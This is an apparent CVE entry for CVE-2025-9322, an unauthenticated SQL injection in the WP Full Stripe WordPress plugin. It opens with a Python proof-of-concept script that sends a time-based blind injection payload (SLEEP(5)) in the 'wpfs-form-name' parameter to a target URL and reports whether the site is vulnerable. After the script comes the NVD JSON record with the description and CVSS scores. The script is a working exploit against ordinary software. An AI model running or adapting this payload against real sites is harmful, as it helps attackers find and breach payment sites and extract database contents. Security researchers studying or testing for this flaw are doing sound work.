CVE-2025-9322

import requests import sys # CVE-2025-9322 PoC - SQL Injection in WP Full Stripe Plugin # Target: WordPress site with WP Full Stripe plugin <= 8.3.1 # Parameter: wpfs-form-name target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Blind SQL Injection payload to extract database version # Using time-based blind injection technique payload_template = "' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '%'='" # Construct the malicious request params = { 'wpfs-form-name': payload_template, 'action': 'wp_full_stripe_payment_form' } print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload: {payload_template}") try: response = requests.get(target_url, params=params, timeout=10) print(f"[+] Response status: {response.status_code}") if response.elapsed.total_seconds() >= 5: print("[+] Server is vulnerable! Time-based blind SQL injection confirmed.") else: print("[-] Server may not be vulnerable or target is not affected.") except requests.exceptions.Timeout: print("[+] Server is vulnerable! Request timed out as expected.") except Exception as e: print(f"[-] Error: {str(e)}")

{"cve": {"id": "CVE-2025-9322", "sourceIdentifier": "[email protected]", "published": "2025-10-25T07:15:41.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Stripe Payment Forms by WP Full Pay – Accept Credit Card Payments, Donations & Subscriptions plugin for WordPress is vulnerable to SQL Injection via the 'wpfs-form-name' parameter in all versions up to, and including, 8.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378785%40wp-full-stripe-free&new=3378785%40wp-full-stripe-free&sfp_email=&sfph_mail=#file6", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/886b612a-d0d1-4880-b423-eb62410a28cd?source=cve", "source": "[email protected]"}]}}